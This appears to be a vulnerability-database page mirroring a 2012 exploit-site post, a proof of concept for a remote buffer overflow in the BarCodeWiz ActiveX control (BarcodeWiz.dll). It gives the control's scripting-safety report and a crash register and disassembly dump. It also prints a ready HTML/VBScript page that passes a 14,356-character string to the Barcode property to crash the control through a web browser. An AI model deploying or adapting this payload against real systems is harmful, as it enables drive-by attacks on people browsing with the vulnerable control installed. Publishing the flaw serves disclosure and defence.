Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BarcodeWiz.dll remote Buffer Overflow PoC

🗓️ 26 Jul 2012 00:00:00Reported by coolkavehType 
zdt
 zdt🔗 0day.today👁 17 Views

Buffer Overflow in BarCodeWiz.dl

Code
Exploit Title: BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote Buffer Overflow PoC
Date: July 25, 2012
Author: coolkaveh
[email protected]
Https://twitter.com/coolkaveh
Vendor Homepage: http://barcodewiz.com/
Version: 4.0.0.0
Tested on: windows 7 SP2

awesome coolkaveh 
==========================================================================
Class BarCodeWiz
GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
Number of Interfaces: 1
Default Interface: IWiz
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  
--------------------------------------------------------------------------
Registers:
--------------------------------------------------------------------------
EIP 023F8D42
EAX 00000021
EBX 00000ADD
ECX 025A2F58 -> 02439F8C
EDX 00000001
EDI 0046D48C -> 00000068
ESI 025A2F58 -> 02439F8C
EBP 0046D47C -> 0046E48C
ESP 0046D464 -> 025A0AA8


Block Disassembly: 
----------------------------------------------------------------------------
23F8D33	INC EBX
23F8D34	MOV [EBP+8],ECX
23F8D37	PUSH ECX
23F8D38	PUSH DWORD PTR [EBP-8]
23F8D3B	MOV ECX,ESI
23F8D3D	CALL 023F837E
23F8D42	MOV [EDI+EBX*4],EAX	  <--- CRASH
23F8D45	INC EBX
23F8D46	DEC DWORD PTR [EBP-4]
23F8D49	MOV EAX,[EBP-4]
23F8D4C	CMP EAX,[EBP-C]
23F8D4F	JL 023F8C80
23F8D55	JMP 023F8ECE
23F8D5A	MOV EAX,[ESI]
23F8D5C	PUSH EBX


ArgDump:
--------------------------------------------------
EBP+8	00000006
EBP+12	025A2F58 -> 02439F8C
EBP+16	00000068
EBP+20	00000021
EBP+24	00000021
EBP+28	00000021

============================================================================
<html>
Exploit
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll"
prototype  = "Property Let Barcode As String"
memberName = "Barcode"
progid     = "BARCODEWIZLib.BarCodeWiz"
argCount   = 1
arg1=String(14356, "A")
poc.Barcode = arg1
</script>



#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2012 00:00Current
7High risk
Vulners AI Score7
buffer overflowbarcodewizactivexexploitvendorwindows 7security vulnerability
17